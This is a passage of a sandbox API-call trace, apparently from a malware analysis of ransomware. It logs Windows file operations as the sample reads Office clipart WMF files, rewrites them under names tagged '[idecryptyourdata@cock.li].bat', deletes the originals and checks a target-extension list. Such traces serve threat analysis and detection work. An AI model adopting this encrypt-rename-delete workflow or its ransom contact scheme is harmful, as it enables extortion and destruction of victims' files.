returned 1 [0199.124] ReadFile (in: hFile=0x3a0, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x0, lpOverlapped=0x0) returned 1 [0199.124] WriteFile (in: hFile=0x380, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0xec, lpOverlapped=0x0) returned 1 [0199.124] SetEndOfFile (hFile=0x380) returned 1 [0199.124] CloseHandle (hObject=0x380) returned 1 [0199.124] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0199.125] SetEndOfFile (hFile=0x3a0) returned 1 [0199.125] CloseHandle (hObject=0x3a0) returned 1 [0199.125] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195260.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0199.126] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195260.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0195260.wmf")) returned 1 [0199.126] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195260.WMF") returned 68 [0199.126] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195260.WMF") returned 68 [0199.126] lstrlenW (lpString=".doc") returned 4 [0199.126] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0199.126] lstrlenW (lpString=".docx") returned 5 [0199.126] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1 [0199.126] lstrlenW (lpString=".pdf") returned 4 [0199.126] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0199.127] lstrlenW (lpString=".xls") returned 4 [0199.127] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0199.127] lstrlenW (lpString=".xlsx") returned 5 [0199.127] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1 [0199.127] lstrlenW (lpString=".ppt") returned 4 [0199.127] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0199.127] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195260.WMF") returned 68 [0199.127] lstrlenW (lpString=".zip") returned 4 [0199.127] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0199.127] lstrlenW (lpString=".rar") returned 4 [0199.127] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0199.127] lstrlenW (lpString=".bz2") returned 4 [0199.127] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0199.127] lstrlenW (lpString=".7z") returned 3 [0199.127] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0199.127] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195260.WMF") returned 68 [0199.127] lstrlenW (lpString=".dbf") returned 4 [0199.127] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0199.127] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195260.WMF") returned 68 [0199.127] lstrlenW (lpString=".1cd") returned 4 [0199.127] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0199.127] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195260.WMF") returned 68 [0199.127] lstrlenW (lpString=".jpg") returned 4 [0199.127] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0199.128] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0199.128] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0199.128] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195320.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0195320.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0199.129] GetLastError () returned 0x0 [0199.129] ReadFile (in: hFile=0x3a0, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x72f8, lpOverlapped=0x0) returned 1 [0199.131] WriteFile (in: hFile=0x380, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0x7300, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0x7300, lpOverlapped=0x0) returned 1 [0199.132] ReadFile (in: hFile=0x3a0, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x0, lpOverlapped=0x0) returned 1 [0199.132] WriteFile (in: hFile=0x380, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0xec, lpOverlapped=0x0) returned 1 [0199.132] SetEndOfFile (hFile=0x380) returned 1 [0199.132] CloseHandle (hObject=0x380) returned 1 [0199.132] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0199.132] SetEndOfFile (hFile=0x3a0) returned 1 [0199.133] CloseHandle (hObject=0x3a0) returned 1 [0199.133] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195320.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0199.133] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195320.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0195320.wmf")) returned 1 [0199.134] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195320.WMF") returned 68 [0199.134] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195320.WMF") returned 68 [0199.134] lstrlenW (lpString=".doc") returned 4 [0199.134] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0199.134] lstrlenW (lpString=".docx") returned 5 [0199.134] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1 [0199.134] lstrlenW (lpString=".pdf") returned 4 [0199.134] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0199.134] lstrlenW (lpString=".xls") returned 4 [0199.134] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0199.134] lstrlenW (lpString=".xlsx") returned 5 [0199.134] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1 [0199.134] lstrlenW (lpString=".ppt") returned 4 [0199.134] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0199.134] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195320.WMF") returned 68 [0199.134] lstrlenW (lpString=".zip") returned 4 [0199.134] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0199.134] lstrlenW (lpString=".rar") returned 4 [0199.134] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0199.134] lstrlenW (lpString=".bz2") returned 4 [0199.134] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0199.135] lstrlenW (lpString=".7z") returned 3 [0199.135] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0199.135] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195320.WMF") returned 68 [0199.135] lstrlenW (lpString=".dbf") returned 4 [0199.135] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0199.135] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195320.WMF") returned 68 [0199.135] lstrlenW (lpString=".1cd") returned 4 [0199.135] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0199.135] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195320.WMF") returned 68 [0199.135] lstrlenW (lpString=".jpg") returned 4 [0199.135] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0199.135] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0199.135] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0199.135] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195342.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0195342.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0199.136] GetLastError () returned 0x0 [0199.136] ReadFile (in: hFile=0x3a0, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x5350, lpOverlapped=0x0) returned 1 [0199.138] WriteFile (in: hFile=0x380, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0x5360, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0x5360, lpOverlapped=0x0) returned 1 [0199.139] ReadFile (in: hFile=0x3a0, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x0, lpOverlapped=0x0) returned 1 [0199.139] WriteFile (in: hFile=0x380, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0xec, lpOverlapped=0x0) returned 1 [0199.139] SetEndOfFile (hFile=0x380) returned 1 [0199.139] CloseHandle (hObject=0x380) returned 1 [0199.139] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0199.139] SetEndOfFile (hFile=0x3a0) returned 1 [0199.140] CloseHandle (hObject=0x3a0) returned 1 [0199.140] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195342.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0199.140] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195342.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0195342.wmf")) returned 1 [0199.141] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195342.WMF") returned 68 [0199.141] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195342.WMF") returned 68 [0199.141] lstrlenW (lpString=".doc") returned 4 [0199.141] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0199.141] lstrlenW (lpString=".docx") returned 5 [0199.141] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1 [0199.141] lstrlenW (lpString=".pdf") returned 4 [0199.141] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0199.141] lstrlenW (lpString=".xls") returned 4 [0199.141] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0199.141] lstrlenW (lpString=".xlsx") returned 5 [0199.141] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1 [0199.141] lstrlenW (lpString=".ppt") returned 4 [0199.141] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0199.141] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195342.WMF") returned 68 [0199.141] lstrlenW (lpString=".zip") returned 4 [0199.141] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0199.141] lstrlenW (lpString=".rar") returned 4 [0199.141] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0199.141] lstrlenW (lpString=".bz2") returned 4 [0199.141] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0199.141] lstrlenW (lpString=".7z") returned 3 [0199.141] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0199.141] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195342.WMF") returned 68 [0199.141] lstrlenW (lpString=".dbf") returned 4 [0199.141] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0199.141] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195342.WMF") returned 68 [0199.141] lstrlenW (lpString=".1cd") returned 4 [0199.142] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0199.142] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195342.WMF") returned 68 [0199.142] lstrlenW (lpString=".jpg") returned 4 [0199.142] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0199.142] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0199.142] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0199.142] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195428.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0195428.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0199.143] GetLastError () returned 0x0 [0199.143] ReadFile (in: hFile=0x3a0, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x48be, lpOverlapped=0x0) returned 1 [0199.314] WriteFile (in: hFile=0x380, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0x48c0, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0x48c0, lpOverlapped=0x0) returned 1 [0199.315] ReadFile (in: hFile=0x3a0, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x0, lpOverlapped=0x0) returned 1 [0199.315] WriteFile (in: hFile=0x380, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0xec, lpOverlapped=0x0) returned 1 [0199.315] SetEndOfFile (hFile=0x380) returned 1 [0199.315] CloseHandle (hObject=0x380) returned 1 [0199.315] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0199.316] SetEndOfFile (hFile=0x3a0) returned 1 [0199.316] CloseHandle (hObject=0x3a0) returned 1 [0199.316] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195428.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0199.317] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195428.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0195428.wmf")) returned 1 [0199.317] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195428.WMF") returned 68 [0199.317] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195428.WMF") returned 68 [0199.317] lstrlenW (lpString=".doc") returned 4 [0199.317] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0199.317] lstrlenW (lpString=".docx") returned 5 [0199.317] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1 [0199.317] lstrlenW (lpString=".pdf") returned 4 [0199.317] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0199.317] lstrlenW (lpString=".xls") returned 4 [0199.317] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0199.317] lstrlenW (lpString=".xlsx") returned 5 [0199.317] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1 [0199.318] lstrlenW (lpString=".ppt") returned 4 [0199.318] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0199.318] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195428.WMF") returned 68 [0199.318] lstrlenW (lpString=".zip") returned 4 [0199.318] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0199.318] lstrlenW (lpString=".rar") returned 4 [0199.318] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0199.318] lstrlenW (lpString=".bz2") returned 4 [0199.318] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0199.318] lstrlenW (lpString=".7z") returned 3 [0199.318] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0199.318] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195428.WMF") returned 68 [0199.318] lstrlenW (lpString=".dbf") returned 4 [0199.318] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0199.318] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195428.WMF") returned 68 [0199.318] lstrlenW (lpString=".1cd") returned 4 [0199.318] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0199.318] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195428.WMF") returned 68 [0199.318] lstrlenW (lpString=".jpg") returned 4 [0199.318] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0199.321] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0199.321] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0199.321] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198102.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0198102.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0199.322] GetLastError () returned 0x0 [0199.322] ReadFile (in: hFile=0x3a0, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0xd6b4, lpOverlapped=0x0) returned 1 [0199.446] WriteFile (in: hFile=0x380, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0xd6c0, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0xd6c0, lpOverlapped=0x0) returned 1 [0199.447] ReadFile (in: hFile=0x3a0, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x0, lpOverlapped=0x0) returned 1 [0199.447] WriteFile (in: hFile=0x380, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0xec, lpOverlapped=0x0) returned 1 [0199.447] SetEndOfFile (hFile=0x380) returned 1 [0199.448] CloseHandle (hObject=0x380) returned 1 [0199.448] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0199.448] SetEndOfFile (hFile=0x3a0) returned 1 [0199.449] CloseHandle (hObject=0x3a0) returned 1 [0199.449] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198102.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0199.449] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198102.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0198102.wmf")) returned 1 [0199.450] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198102.WMF") returned 68 [0199.450] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198102.WMF") returned 68 [0199.450] lstrlenW (lpString=".doc") returned 4 [0199.450] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0199.450] lstrlenW (lpString=".docx") returned 5 [0199.450] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1 [0199.450] lstrlenW (lpString=".pdf") returned 4 [0199.450] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0199.450] lstrlenW (lpString=".xls") returned 4 [0199.450] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0199.450] lstrlenW (lpString=".xlsx") returned 5 [0199.450] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1 [0199.450] lstrlenW (lpString=".ppt") returned 4 [0199.450] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0199.450] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198102.WMF") returned 68 [0199.450] lstrlenW (lpString=".zip") returned 4 [0199.450] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0199.450] lstrlenW (lpString=".rar") returned 4 [0199.450] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0199.450] lstrlenW (lpString=".bz2") returned 4 [0199.450] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0199.450] lstrlenW (lpString=".7z") returned 3 [0199.450] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0199.450] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198102.WMF") returned 68 [0199.450] lstrlenW (lpString=".dbf") returned 4 [0199.451] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0199.451] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198102.WMF") returned 68 [0199.451] lstrlenW (lpString=".1cd") returned 4 [0199.451] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0199.451] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198102.WMF") returned 68 [0199.451] lstrlenW (lpString=".jpg") returned 4 [0199.451] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0199.451] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0199.451] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0199.451] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198377.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0198377.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0199.452] GetLastError () returned 0x0 [0199.452] ReadFile (in: hFile=0x3a0, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x9d6c, lpOverlapped=0x0) returned 1 [0199.685] WriteFile (in: hFile=0x380, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0x9d70, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0x9d70, lpOverlapped=0x0) returned 1 [0199.686] ReadFile (in: hFile=0x3a0, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x0, lpOverlapped=0x0) returned 1 [0199.686] WriteFile (in: hFile=0x380, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0xec, lpOverlapped=0x0) returned 1 [0199.686] SetEndOfFile (hFile=0x380) returned 1 [0199.686] CloseHandle (hObject=0x380) returned 1 [0199.686] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0199.687] SetEndOfFile (hFile=0x3a0) returned 1 [0199.687] CloseHandle (hObject=0x3a0) returned 1 [0199.687] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198377.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0199.688] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198377.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0198377.wmf")) returned 1 [0199.688] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198377.WMF") returned 68 [0199.688] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198377.WMF") returned 68 [0199.688] lstrlenW (lpString=".doc") returned 4 [0199.688] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0199.688] lstrlenW (lpString=".docx") returned 5 [0199.688] lstrcmpiW (lpString1=".docx", lpString2="7.WMF") returned -1 [0199.688] lstrlenW (lpString=".pdf") returned 4 [0199.688] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") 